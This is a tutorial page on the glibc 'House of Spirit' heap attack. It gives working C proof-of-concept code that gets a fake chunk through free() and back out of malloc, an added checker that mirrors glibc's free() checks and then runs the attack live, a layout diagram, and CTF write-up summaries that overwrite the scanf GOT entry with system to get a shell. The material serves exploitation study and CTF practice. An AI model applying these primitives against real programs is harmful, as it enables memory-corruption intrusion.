# House of Spirit
```c
// The header names were lost from this copy; stdio.h and stdlib.h are the ones the code needs.
#include <stdio.h>
#include <stdlib.h>

// Code altered to add some prints from: https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit

struct fast_chunk {
    size_t prev_size;
    size_t size;
    struct fast_chunk *fd;
    struct fast_chunk *bk;
    char buf[0x20];                 // chunk falls in fastbin size range (sizeof == 0x40)
};

int main() {
    // Two fake chunks in consecutive memory. The array is forced to 16-byte
    // alignment because free() rejects a misaligned chunk ("free(): invalid pointer").
    struct fast_chunk fake_chunks[2] __attribute__((aligned(16)));
    void *ptr, *victim;

    ptr = malloc(0x30);

    printf("Original alloc address: %p\n", ptr);
    printf("Main fake chunk:%p\n", &fake_chunks[0]);
    printf("Second fake chunk for size: %p\n", &fake_chunks[1]);

    // Passes size check of "free(): invalid size"
    fake_chunks[0].size = sizeof(struct fast_chunk);

    // Passes "free(): invalid next size (fast)"
    fake_chunks[1].size = sizeof(struct fast_chunk);

    // Attacker overwrites a pointer that is about to be 'freed'
    // Point to .fd as it's the start of the content of the chunk
    ptr = (void *)&fake_chunks[0].fd;

    free(ptr);

    victim = malloc(0x30);          // returns the fake chunk
    printf("Victim: %p\n", victim);

    return 0;
}
```
</details>
### Goal

* Be able to insert an address into the tcache / fast bin so that it can later be handed out by `malloc`

### Requirements

* This attack requires the attacker to be able to craft a couple of fake fast chunks with correct size fields, and then to be able to free the first fake chunk so that it ends up in the bin.

### Attack

* Create fake chunks that pass the security checks: you need 2 fake chunks, essentially with the right size values at the right offsets
* Somehow get the first fake chunk freed so that it lands in the fast or tcache bin, then allocate it in order to write to that address
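To see exactly which of the two fake chunks each check above looks at, here is an added example (not code from the original page or from the linked writeups). `house_of_spirit_precheck` reimplements, as a pre-flight test on a candidate pointer, the conditions that x86-64 glibc's `free()` enforces before it accepts a chunk into the tcache or a fastbin; the constants (`GLOBAL_MAX_FAST`, `TCACHE_COUNT`, `SYSTEM_MEM`, ...) are the glibc 2.3x 64-bit defaults and are assumptions about the target. `make_fake_chunks` and `scenario` are helper names invented for this example, and `main()` then performs the attack for real against the host allocator (assumes x86-64 glibc).

```c
/*
 * Added example: pre-flight checker for a House of Spirit fake chunk on
 * x86-64 glibc. Constants are glibc 2.3x 64-bit defaults (assumed target).
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SIZE_SZ           8UL
#define MALLOC_ALIGN_MASK 0xfUL      /* chunks are 16-byte aligned on x86-64 */
#define MINSIZE           0x20UL
#define GLOBAL_MAX_FAST   0x80UL     /* default fastbin limit on 64-bit */
#define TCACHE_MAX_CHUNK  0x410UL    /* largest chunk size served by tcache */
#define TCACHE_COUNT      7          /* mp_.tcache_count: entries per tcache bin */
#define SYSTEM_MEM        0x21000UL  /* av->system_mem of a fresh main arena (assumed) */
#define SIZE_BITS         0x7UL      /* PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA */
#define IS_MMAPPED        0x2UL

enum verdict {
    OK_TCACHE,     /* accepted by tcache_put: the second fake chunk is never looked at */
    OK_FASTBIN,    /* tcache bin full: fastbin path, next chunk's size is checked */
    BAD_MMAP_BIT,  /* "munmap_chunk(): invalid pointer" */
    BAD_ALIGN,     /* "free(): invalid pointer" */
    BAD_SIZE,      /* "free(): invalid size" */
    BAD_NEXT_SIZE, /* "free(): invalid next size (fast)" */
    NOT_FAST       /* above global_max_fast and not tcache-able: normal free path, stricter checks */
};

/* ptr is the pointer the victim program hands to free(), i.e. the user data
 * of fake chunk 0 (its header is 2*SIZE_SZ before it). tcache_filled is how
 * many entries the tcache bin for that size already holds. */
enum verdict house_of_spirit_precheck(const void *ptr, int tcache_filled)
{
    const uint8_t *chunk = (const uint8_t *)ptr - 2 * SIZE_SZ;
    uint64_t raw_size, size, next_raw, next_size;

    memcpy(&raw_size, chunk + SIZE_SZ, sizeof raw_size);
    if (raw_size & IS_MMAPPED)                     /* __libc_free: munmap_chunk() path */
        return BAD_MMAP_BIT;
    size = raw_size & ~SIZE_BITS;                  /* chunksize(p) */

    if ((uintptr_t)chunk & MALLOC_ALIGN_MASK)      /* misaligned_chunk(p) */
        return BAD_ALIGN;
    if (size < MINSIZE || (size & MALLOC_ALIGN_MASK))
        return BAD_SIZE;

    /* tcache path (glibc >= 2.26): only the checks above are applied */
    if (size <= TCACHE_MAX_CHUNK && tcache_filled < TCACHE_COUNT)
        return OK_TCACHE;

    if (size > GLOBAL_MAX_FAST)
        return NOT_FAST;

    /* fastbin path: this is where fake chunk 1's size field matters */
    memcpy(&next_raw, chunk + size + SIZE_SZ, sizeof next_raw);
    next_size = next_raw & ~SIZE_BITS;
    if (next_raw <= 2 * SIZE_SZ || next_size >= SYSTEM_MEM)
        return BAD_NEXT_SIZE;
    return OK_FASTBIN;
}

/* Write the two size fields of the fake chunks into buf (same layout as the
 * page's fake_chunks[2]) and return the pointer a victim would free. */
void *make_fake_chunks(uint8_t *buf, size_t buflen, uint64_t size0, uint64_t size1)
{
    if ((size0 & ~SIZE_BITS) + 2 * SIZE_SZ > buflen)   /* both headers must fit */
        abort();
    memset(buf, 0, buflen);
    memcpy(buf + SIZE_SZ, &size0, sizeof size0);                        /* chunk 0 size */
    memcpy(buf + (size0 & ~SIZE_BITS) + SIZE_SZ, &size1, sizeof size1); /* chunk 1 size */
    return buf + 2 * SIZE_SZ;
}

/* Build a scenario in a 16-byte-aligned static buffer, optionally shifting
 * the fake chunk by `misalign` bytes, and report what free() would do. */
enum verdict scenario(uint64_t size0, uint64_t size1, int misalign, int tcache_filled)
{
    static uint8_t buf[0x600] __attribute__((aligned(16)));
    void *ptr = make_fake_chunks(buf + misalign, sizeof buf - misalign, size0, size1);
    return house_of_spirit_precheck(ptr, tcache_filled);
}

int main(void)
{
    /* Live run against the host allocator (assumes x86-64 glibc): the fake
     * chunk sits in .bss, is forced to 16-byte alignment, and both size
     * fields are 0x40 as in the page's example. */
    static uint8_t buf[0x100] __attribute__((aligned(16)));
    void *ptr = make_fake_chunks(buf, sizeof buf, 0x40, 0x40);

    printf("precheck verdict: %d (0 = tcache, 1 = fastbin)\n",
           (int)house_of_spirit_precheck(ptr, 0));
    free(ptr);                              /* fake chunk enters tcache[0x40] */
    void *victim = malloc(0x30);            /* and comes straight back out */
    printf("fake chunk %p, victim %p: %s\n", ptr, victim,
           victim == ptr ? "House of Spirit worked" : "did not get the fake chunk");
    return victim == ptr ? 0 : 1;
}
```

The verdicts make the practical point explicit: on a tcache-enabled libc the `free(): invalid next size (fast)` check only runs when the tcache bin for that size is already full (7 entries by default), so the second fake chunk is what keeps the attack working once the tcache is exhausted, while alignment, the `IS_MMAPPED` bit and the size being a 16-byte multiple of at least `MINSIZE` are checked on every path.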
**The code from** [**guyinatuxedo**](https://guyinatuxedo.github.io/39-house_of_spirit/house_spirit_exp/index.html) **is great for understanding the attack.** This structure from that code summarises it well:
```c
/*
this will be the structure of our two fake chunks:
assuming that you compiled it for x64
+-------+---------------------+------+
| 0x00: | Chunk # 0 prev size | 0x00 |
+-------+---------------------+------+
| 0x08: | Chunk # 0 size | 0x60 |
+-------+---------------------+------+
| 0x10: | Chunk # 0 content | 0x00 |
+-------+---------------------+------+
| 0x60: | Chunk # 1 prev size | 0x00 |
+-------+---------------------+------+
| 0x68: | Chunk # 1 size | 0x40 |
+-------+---------------------+------+
| 0x70: | Chunk # 1 content | 0x00 |
+-------+---------------------+------+
for what we are doing the prev size values don't matter too much
the important thing is the size values of the heap headers for our fake chunks
*/
```

Note that the second fake chunk is needed to get past some sanity checks: on the fastbin path `free()` verifies that the size field of the chunk following the one being freed is larger than `2*SIZE_SZ` and smaller than `av->system_mem`, so whatever sits at `fake_chunk + size` must look like a plausible size. On a libc with tcache (glibc 2.26 and later) that check is skipped as long as the tcache bin for the size has room, but the first chunk must still be 16-byte aligned and its size must be a multiple of 16 and at least `MINSIZE`, or `free()` aborts with `free(): invalid pointer` / `free(): invalid size`.
Examples from CTF write-ups:

* **Libc infoleak**: Through an overflow it is possible to change a pointer so that it points to a GOT address, leaking a libc address via the CTF's read action.
* **House of Spirit**: Abusing a counter that counts the number of "rifles", it is possible to generate the fake size of the first fake chunk; then, abusing a "message", it is possible to fake the size of the second chunk; finally, abusing an overflow, it is possible to change the pointer that is going to be freed so that our first fake chunk gets freed. We can then allocate it, and inside it there will be the address where "message" is stored. That can be made to point to the `scanf` entry in the GOT table, so we can overwrite it with the address of `system`. The next time `scanf` is called, we send the input `"/bin/sh"` and get a shell.

* **Glibc leak**: Uninitialised stack buffer.
* **House of Spirit**: We can modify the first index of a global array of heap pointers. With a single-byte modification we call `free` on a fake chunk inside a valid chunk, so that after allocating again we get overlapping chunks. From there, a simple tcache poisoning attack yields an arbitrary write primitive.